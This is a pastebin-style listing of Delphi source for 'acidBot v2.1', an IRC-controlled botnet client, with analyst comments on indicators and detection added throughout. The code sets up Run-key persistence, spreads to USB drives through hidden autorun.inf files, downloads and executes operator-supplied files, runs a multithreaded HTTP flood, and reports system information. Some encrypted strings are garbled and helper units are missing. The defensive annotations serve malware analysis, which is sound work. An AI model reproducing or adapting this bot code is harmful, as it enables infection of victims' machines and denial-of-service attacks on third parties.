FlyFar

acidBot2.dpr

Dec 19th, 2023
Delphi 9.20 KB | Cybersecurity | 0 0
  1. program acidBot2;
  2. // acidBot v2.1 by Acid/HuckJam
  3. // This bot was made to show that Delphi
  4. // is perfectly fine for bots too.
  5.  
  6. // Credits to Aphex for his TThread & ApplicationUnit.
  7.  
  8. uses
  9.   Windows,
  10.   WinSock,
  11.   ShellAPI,
  12.   abEncryption,
  13.   abFunctions,
  14.   abWinsock,
  15.   abThreads,
  16.   abApplication,
  17.   abHTTPFlood;
  18.  
  19. var
      // Compiled-in configuration. Everything below is a plain literal in the binary,
      // so these values are the sample's main static indicators (as published here).
      //
      // IRCDInfo: [1] server address and [2] port passed to Connect in CreateConnection,
      // [3] channel used as join target and default message target, [4] sent after the
      // channel name when joining (empty here; presumably the channel key).
      // NOTE(review): 10.0.0.3 is a private (RFC 1918) address, so this copy is
      // configured for a local/lab server rather than an Internet host.
  20.   IRCDInfo: array[1..4] of String = ('10.0.0.3', '32828', '#kewl', '');
      // FileInfo: [1] file name used for the installed copy and the removable-drive copy,
      // [2] registry key path and [3] value name used with HKEY_CURRENT_USER in Install
      // (the per-user Run autostart key), [4] mutex name used for the single-instance
      // check in the main block. Host-based detection can key on the value name/file
      // name pair and on the named mutex.
  21.   FileInfo: array[1..4] of String = ('regdrv.exe', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'Registry Driver', 'aB2-Mutex');
      // AuthInfo: [1] host mask handed to CheckAuthHost, [2] operator password compared
      // against the second word of the login command, [3] command prefix character.
      // The password is stored unencrypted, so it is recoverable from any sample.
  22.   AuthInfo: array[1..3] of String = ('*!*@*', 'mypassword', '!');
      // BotComnd: command words recognised by ParseIRC, indexed 1..11 in this order.
  23.   BotComnd: array[1..11] of String = ('login', 'logout', 'uninstall', 'die', 'version', 'sysinfo', 'opensite', 'download', 'spread', 'httpflood', 'httpfloodstop');
      // IRCProto: seven encrypted strings that DecryptStrings replaces at startup.
      // The ciphertext bytes are mis-encoded in this copy of the paste and cannot be
      // recovered from it. From usage: [7] is the verb used to send chat messages,
      // [4] and [5] are sent at registration, [3] is sent with channel + key, and a
      // match on [1] is answered with 'pong' (presumably the usual IRC verbs; the
      // plaintext is not visible in this listing).
  24.   IRCProto: array[1..7] of String = ('����', '����', '����', '����', '����', '���', '�������');
  25.  
  26. var
      // Process-wide state. These are plain globals read and written by the IRC
      // receive thread and by the worker threads it starts; no locking is visible
      // in this file.
  27.   Application: TApplication;
      // Single control-channel socket, recreated on every reconnect attempt.
  28.   ircSocket: TClientSocket;
      // GetPath: install location computed in the main block.
      // AuthName: first 25 characters of the raw line that carried a successful login.
      // BotName: nickname generated per connection. Master: nick of the last accepted sender.
      // Target: host name used by the HTTP flood threads.
  29.   GetPath, AuthName, BotName, Master, Target: String;
      // Port used by the HTTP flood threads.
  30.   Port: Integer;
      // Handle returned by CreateMutex for the single-instance check.
  31.   Mutex: Cardinal;
      // LoggedIn: an operator session is active. PrivateMsg: reply to Master instead of
      // the channel. Spread / Flooding: run flags polled by the worker loops.
  32.   LoggedIn, PrivateMsg, Spread, Flooding: Boolean;
  33.  
  34. procedure DecryptStrings();
      // Replaces each of the seven IRCProto entries with the result of Decrypt().
      // Decrypt is not defined in this listing (presumably it comes from abEncryption).
      // Analyst note: because the protocol strings are only decoded at run time, they
      // will not appear in a plain strings dump of the binary; the unencrypted
      // configuration arrays (IRCDInfo, FileInfo, AuthInfo, BotComnd) will.
  35. var
  36.   I: Integer;
  37. begin
  38.   for I := 1 to 7 do IRCProto[I] := Decrypt(IRCProto[I]);
  39. end;
  40.  
  41. procedure SendMessage(Msg: String);
      // Sends Msg over the control socket as "<IRCProto[7]> <target> :<Msg>".
      // The target is Master when the last accepted command was flagged as private
      // (PrivateMsg), otherwise the configured channel IRCDInfo[3].
      // Every line is terminated with #10#13 (LF then CR), the reverse of the CR LF
      // order IRC specifies; this byte order is a usable trait for network signatures.
  42. begin
  43.   if PrivateMsg then ircSocket.SendString(IRCProto[7] + ' ' + Master + ' :' + Msg + #10#13) else
  44.   ircSocket.SendString(IRCProto[7] + ' ' + IRCDInfo[3] + ' :' + Msg + #10#13);
  45. end;
  46.  
  47. procedure HTTPFloodThread();
      // Worker body for the 'httpflood' command: while the global Flooding flag is set,
      // it connects to Target:Port, sends one request built by CreateHTTPRequest
      // (not defined in this listing; presumably from abHTTPFlood), disconnects, and
      // repeats. Target and Port are globals written by ParseIRC.
      // Detection: from the infected host this appears as a sustained stream of
      // very short-lived outbound TCP connections to a single host and port; on the
      // receiving side, per-source connection and request rate limits are the
      // relevant control.
  48. var
  49.   httpSocket: TClientSocket;
  50.   Site: String;
  51. begin
  52.   httpSocket := TClientSocket.Create;
  53.   while Flooding do
  54.   begin
  55.     httpSocket.Connect(Target, Port);
  56.     if httpSocket.Connected then
  57.     begin
  58.       Site := 'http://' + Target;
  59.       httpSocket.SendString(CreateHTTPRequest(Site));
  60.       httpSocket.Disconnect;
            // The 1 ms pause and message pump run only after a successful connect;
            // a failed connect goes straight back to the top of the loop.
  61.       Sleep(1);
  62.       Application.ProcessMessages;
  63.     end;
  64.   end;
  65.   httpSocket.Free;
  66. end;
  67.  
  68. procedure SpreadUSB();
      // Worker body for 'spread on': while the global Spread flag is set, every 30
      // seconds it walks drive letters B..Z and, for each drive reported as
      // DRIVE_REMOVABLE that does not yet hold FileInfo[1] at its root, copies the
      // running executable there, marks it hidden, writes a hidden autorun.inf that
      // names the copy in its open= line, and reports the drop on the control channel.
      // Detection: a hidden autorun.inf plus a hidden regdrv.exe at the root of a
      // removable drive. The existence check covers only the executable, so an
      // existing autorun.inf is overwritten whenever the executable is absent.
      // Mitigation: this relies on AutoRun being honoured for removable media;
      // keeping AutoRun disabled for such drives removes the automatic launch.
  69. var
  70.   Drive: Char;
  71.   Path: String;
  72.   AutoStart: TextFile;
  73. begin
  74.   while Spread do
  75.   begin
  76.     for Drive := 'B' to 'Z' do
  77.     begin
  78.       if GetDriveType(PChar(Drive + ':\')) = DRIVE_REMOVABLE then
  79.       begin
  80.         Path := Drive + ':\' + FileInfo[1];
  81.         if FileExists(Path) = False then
  82.         begin
  83.           CopyFile(PChar(ParamStr(0)), PChar(Path), False);
  84.           SetFileAttributes(PChar(Path), FILE_ATTRIBUTE_HIDDEN);
  85.           AssignFile(AutoStart, Drive + ':\' + 'autorun.inf');
  86.           ReWrite(AutoStart);
  87.           WriteLn(AutoStart, '[autorun]');
  88.           WriteLn(AutoStart, 'open=' + FileInfo[1]);
  89.           CloseFile(AutoStart);
  90.           SetFileAttributes(PChar(Drive + ':\' + 'autorun.inf'), FILE_ATTRIBUTE_HIDDEN);
  91.           SendMessage('[Spread] Device found, file dropped.');
  92.         end;
  93.       end;
  94.     end;
  95.     Sleep(30000);
  96.   end;
  97. end;
  98.  
  99. procedure Install(Uninstall: Integer);
       // Persistence set-up (Uninstall = 0) and removal (Uninstall = 1); any other
       // value does nothing.
       // Uninstall = 0: if the running image is not at GetPath, copy it there
       // (overwriting any existing file), start the copy and exit this process.
       // If it is already running from GetPath, write the value FileInfo[3] with data
       // GetPath under HKEY_CURRENT_USER\<FileInfo[2]>, i.e. the per-user Run key.
       // Uninstall = 1: delete that Run value, call DeleteSelf on the running image
       // and exit. MatchStrings, ExecuteFile, InsertRegValue, DeleteRegValue and
       // DeleteSelf are not defined in this listing.
       // Detection / cleanup: the HKCU Run value 'Registry Driver' pointing at
       // regdrv.exe, and that file at the install path, are the artefacts to look for.
  100. begin
  101.   if Uninstall = 0 then
  102.   begin
  103.     if MatchStrings(ParamStr(0), GetPath) = False then
  104.     begin
  105.       CopyFile(PChar(ParamStr(0)), PChar(GetPath), False);
  106.       ExecuteFile(GetPath);
  107.       ExitProcess(0);
  108.     end else InsertRegValue(HKEY_CURRENT_USER, FileInfo[2], FileInfo[3], GetPath);
  109.   end else
  110.   if Uninstall = 1 then
  111.   begin
  112.     DeleteRegValue(HKEY_CURRENT_USER, FileInfo[2], FileInfo[3]);
  113.     DeleteSelf(ParamStr(0));
  114.     ExitProcess(0);
  115.   end;
  116. end;
  117.  
  118. procedure ParseIRC(RawData: String);
       // Command dispatcher: takes one raw line from the control connection and, if it
       // is a chat message carrying a prefixed command, executes it.
       // Flow: (1) accept the line only if CheckAuthHost(AuthInfo[1], RawData) passes
       // and the line contains IRCProto[7]; (2) record the sender nick in Master and
       // decide whether the message was addressed to the bot or to the channel;
       // (3) strip everything up to the message text; (4) require the prefix
       // AuthInfo[3]; (5) split into at most four space-separated parameters;
       // (6) handle login/logout, then the operator commands.
       // CheckAuthHost, TrimEx, LeftStr, RightStr, Split and Download are not defined
       // in this listing.
       // Analyst note: the whole capability set of the sample is enumerated here —
       // self-removal, termination, host inventory, shell 'open', download with
       // optional execute, removable-drive propagation and HTTP flooding.
  119. var
  120.   Trimmed: String;
  121.   Param: array[1..4] of String;
  122.   RawDataBack: String;
  123.   I: Integer;
  124. begin
  125.   if (CheckAuthHost(AuthInfo[1], RawData)) and (Pos(IRCProto[7], RawData) > 0) then
  126.   begin
  127.     RawDataBack := RawData;
           // Drop the first character of the line, then take the text before '!' as
           // the sender's nick.
  128.     Delete(RawDataBack, 1, 1);
  129.     Master := Copy(RawDataBack, 1, Pos('!', RawDataBack) - 1);
           // Treated as a private message when the bot's own nick occurs past position 7.
  130.     if Pos(BotName, RawDataBack) > 7 then PrivateMsg := True else PrivateMsg := False;
           // Remove everything through "<target> :" so only the message text remains.
  131.     if PrivateMsg then Delete(RawDataBack, 1, Pos(BotName + ' :', RawDataBack) + Length(BotName) + 1) else
  132.     Delete(RawDataBack, 1, Pos(IRCDInfo[3] + ' :', RawDataBack) + Length(IRCDInfo[3]) + 1);
  133.     Trimmed := TrimEx(RawDataBack);
           // Only messages starting with the command prefix ('!' in this build) go further.
  134.     if LeftStr(Trimmed, 1) = AuthInfo[3] then
  135.     begin
  136.       Delete(Trimmed, 1, 1);
  137.  
  138.       //This is a cheap method so we don't need to make a TStringList replacement.
  139.       //There might be a better way but this is what I chose.
  140.       Param[1] := Split(Trimmed, ' ', 1);
  141.       Param[2] := Split(Trimmed, ' ', 2);
  142.       Param[3] := Split(Trimmed, ' ', 3);
  143.       Param[4] := Split(Trimmed, ' ', 4);
  144.  
             // login <password>: compared against the compiled-in AuthInfo[2]. The
             // session is bound to the first 25 characters of the raw line (AuthName),
             // and the password travels in clear text over the IRC connection.
  145.       if Param[1] = BotComnd[1] then
  146.       begin
  147.         if Param[2] = AuthInfo[2] then
  148.         begin
  149.           if LeftStr(RawData, 25) <> AuthName then
  150.           begin
  151.             LoggedIn := True;
  152.             AuthName := LeftStr(RawData, 25);
  153.             SendMessage('Welcome Master!');
  154.           end;
  155.         end;
  156.       end;
  157.  
             // logout: checked only against LoggedIn, not against AuthName.
  158.       if LoggedIn = True then
  159.       begin
  160.         if Param[1] = BotComnd[2] then
  161.         begin
  162.           LoggedIn := False;
  163.           AuthName := '';
  164.           SendMessage('I will wait for you master!');
  165.         end;
  166.       end;
  167.  
             // Everything below requires an active session AND that the first 25
             // characters of this line equal those recorded at login.
  168.       if (LoggedIn = True) and (AuthName = LeftStr(RawData, 25)) then
  169.       begin
               // These four compare the whole message text, so they match only when
               // the command is sent without arguments.
               // uninstall -> remove persistence and self-delete; die -> exit;
               // version -> fixed banner; sysinfo -> host inventory sent to the channel
               // or operator (OS, CPU, RAM, video card, uptime via helpers not shown).
  170.         if Trimmed = BotComnd[3] then Install(1);
  171.         if Trimmed = BotComnd[4] then ExitProcess(0);
  172.         if Trimmed = BotComnd[5] then SendMessage('acidBot v2.1');
  173.         if Trimmed = BotComnd[6] then SendMessage('OS: ' + GetWinVersion + ', Processor: ' + GetProcessorName + ', RAM: ' + GetTotalRAM + ', GFX Card: ' + GetVideoCard + ', System Uptime: ' + GetUptime);
  174.  
               // opensite <arg>: the operator-supplied string goes to ShellExecute
               // with the 'open' verb and a visible window; no validation is applied
               // in this file.
  175.         if Param[1] = BotComnd[7] then
  176.         begin
  177.           ShellExecute(0, 'open', PChar(Param[2]), '', '', SW_SHOW);
  178.           SendMessage('The website have been opened.');
  179.         end;
  180.  
               // download <source> <destination> [1]: fetches via Download() and, when
               // the fourth word is '1', runs the saved file. This is the sample's
               // arbitrary-code-execution path; on a host it shows up as a new file
               // written by, and a child process started from, the installed image.
  181.         if Param[1] = BotComnd[8] then
  182.         begin
  183.           SendMessage('Attempting to download ' + Param[2]);
  184.           if Download(Param[2], Param[3]) then
  185.           begin
  186.             if Param[4] <> '1' then SendMessage('Download Complete!');
  187.             if Param[4] = '1' then
  188.             begin
  189.               ExecuteFile(Param[3]);
  190.               SendMessage('File Downloaded & Executed!');
  191.             end;
  192.           end else SendMessage('Download Failed!');
  193.         end;
  194.  
               // spread on|off: 'on' sets the flag and starts a new SpreadUSB thread
               // each time it is received; 'off' clears the flag so the loops end.
  195.         if Param[1] = BotComnd[9] then
  196.         begin
  197.           if Param[2] = 'on' then
  198.           begin
  199.             Spread := True;
  200.             TThread.Create(@SpreadUSB, 0);
  201.             SendMessage('[Spread] Spreading ON.');
  202.           end else
  203.           if Param[2] = 'off' then
  204.           begin
  205.             Spread := False;
  206.             SendMessage('[Spread] Spreading OFF.');
  207.           end;
  208.         end;
  209.  
               // httpflood <host> <port>: strips a leading 'http://' and a trailing
               // '/', stores host and port in the globals Target and Port, and starts
               // 21 HTTPFloodThread workers (loop 0..20) per command received.
  210.         if Param[1] = BotComnd[10] then
  211.         begin
  212.           Flooding := True;
  213.           if Pos('http://', Param[2]) > 0 then Delete(Param[2], 1, 7);
  214.           if RightStr(Param[2], 1) = '/' then Delete(Param[2], Length(Param[2]), 1);
  215.           Target := Param[2];
  216.           Port := StrToInt(Param[3]);
  217.           for I := 0 to 20 do TThread.Create(@HTTPFloodThread, 0);
  218.           SendMessage('[HTTPFlood] Started on ' + Target);
  219.         end;
  220.  
               // httpfloodstop: clears the flag polled by every flood worker.
  221.         if Param[1] = BotComnd[11] then
  222.         begin
  223.           Flooding := False;
  224.           SendMessage('[HTTPFlood] Stopped.');
  225.         end;
  226.  
  227.       end;
  228.     end;
  229.   end;
  230. end;
  231.  
  232. procedure RecieveData(Thread: TThread; Socket: TClientSocket);
       // Receive loop for the control connection. Puts the socket into non-blocking
       // mode, then polls it roughly once per millisecond while it stays connected.
       // Each received buffer is cut at #10 (LF); every complete line is passed to
       // ParseIRC and then checked for three protocol events:
       //   - contains IRCProto[6]: send IRCProto[3] with channel and key (join);
       //   - contains IRCProto[2] (case-insensitive) and is not a chat message: same join;
       //   - contains IRCProto[1] (case-insensitive) and is not a chat message: echo the
       //     line back with IRCProto[1] replaced by 'pong' (keep-alive reply).
       // Text after the last LF in a buffer is discarded rather than carried over to
       // the next read. When the connection drops, the socket is disconnected and freed.
       // The Thread parameter is not used in this body.
  233. var
  234.  Data, Temp: String;
  235.  NonBlocking: Integer;
  236. begin
  237.  NonBlocking := 1;
  238.  IoCtlSocket(Socket.Socket, FIONBIO, NonBlocking);
  239.  while Socket.Connected do
  240.  begin
  241.   Data := Socket.ReceiveString;
  242.   if Length(Data) > 0 then
  243.   begin
  244.     while(Pos(#10, Data) <> 0) do
  245.     begin
  246.       Temp := Copy(Data, 1, Pos(#10, Data) - 1);
  247.       Delete(Data, 1, Pos(#10, Data));
  248.       ParseIRC(Temp);
  249.       if Pos(IRCProto[6], Temp) > 0 then ircSocket.SendString(IRCProto[3] + ' ' + IRCDInfo[3] + ' ' + IRCDInfo[4] + #10#13);
  250.       if (Pos(IRCProto[2], LowerCase(Temp)) > 0) and (Pos(IRCProto[7], Temp) = 0)then ircSocket.SendString(IRCProto[3] + ' '  + IRCDInfo[3] + ' ' + IRCDInfo[4] + #10#13);
  251.       if (Pos(IRCProto[1], LowerCase(Temp)) > 0) and (Pos(IRCProto[7], Temp) = 0) then ircSocket.SendString(ReplaceString(Temp, IRCProto[1], 'pong') + #10#13);
  252.     end;
  253.     if Temp <> '' then Temp := '';
  254.     Data := '';
  255.   end;
  256.   Sleep(1);
  257.   Application.ProcessMessages;
  258.  end;
  259.  Socket.Disconnect;
  260.  Socket.Free;
  261. end;
  262.  
  263. procedure CreateConnection(Thread: TThread);
       // Control-channel thread: loops forever, creating a fresh socket, connecting to
       // IRCDInfo[1]:IRCDInfo[2] and, on success, registering and handing the socket to
       // RecieveData until the connection drops. It waits 5 seconds between attempts.
       // A socket whose connect fails is not freed here.
       // Network indicators visible in this block:
       //   - a new outbound connection attempt to the configured server about every
       //     5 seconds while it is unreachable;
       //   - a registration line of IRCProto[4] followed by ' acidBot acidBot acidBot acidBot ';
       //   - a nickname of the form '[<GetWinLang result>|<nine digits>]', where the
       //     number is 100000000 + Random(899999999) and changes on every connection.
  264. begin
  265.  while 0 < 1 do
  266.  begin
  267.    ircSocket := TClientSocket.Create;
  268.    ircSocket.Connect(IRCDInfo[1], StrToInt(IRCDInfo[2]));
  269.    if ircSocket.Connected then
  270.    begin
  271.      Randomize;
  272.      BotName := '[' + GetWinLang + '|' + IntToStr(100000000 + Random(899999999)) + ']';
  273.      ircSocket.SendString(IRCProto[4] + ' acidBot acidBot acidBot acidBot ' + #10#13);
  274.      ircSocket.SendString(IRCProto[5] + ' ' + BotName + #10#13);
  275.      RecieveData(Thread, ircSocket);
  276.    end;
  277.    Sleep(5000);
  278.  end;
  279. end;
  280.  
  281. begin
         // Program entry. Order of operations, as an analyst would see it at run time:
         // 1. Compute the install path: GetAppDataPath (helper not shown) + 'regdrv.exe'.
  282.   GetPath := GetAppDataPath + FileInfo[1];
         // 2. Decode the seven protocol strings.
  283.   DecryptStrings();
         // 3. Install: relocate to GetPath and exit, or, when already running from
         //    there, write the HKCU Run value.
  284.   Install(0);
         // 4. Single-instance guard: exit if the named mutex 'aB2-Mutex' cannot be
         //    created or already exists. The mutex name is a host indicator for a
         //    running instance.
  285.   Mutex := CreateMutex(nil, True, PChar(FileInfo[4]));
  286.   if (Mutex = 0) or (GetLastError = ERROR_ALREADY_EXISTS) then ExitProcess(0);
         // 5. Delete '~SystemCache.bat' by relative name (resolved against the current
         //    directory). NOTE(review): presumably a leftover of the DeleteSelf helper;
         //    that helper is not shown, so confirm before treating the name as an indicator.
  287.   DeleteFile('~SystemCache.bat');
         // 6. Start the control-channel thread only when running from the install path.
  288.   if MatchStrings(ParamStr(0), GetPath) then
  289.   TThread.Create(@CreateConnection, 0);
         // 7. Keep the main thread alive, pumping messages about once per millisecond.
  290.   Application := TApplication.Create;
  291.   while 0 < 1 do
  292.   begin
  293.     Sleep(1);
  294.     Application.ProcessMessages;
  295.   end;
  296. end.
Tags: botnet delphi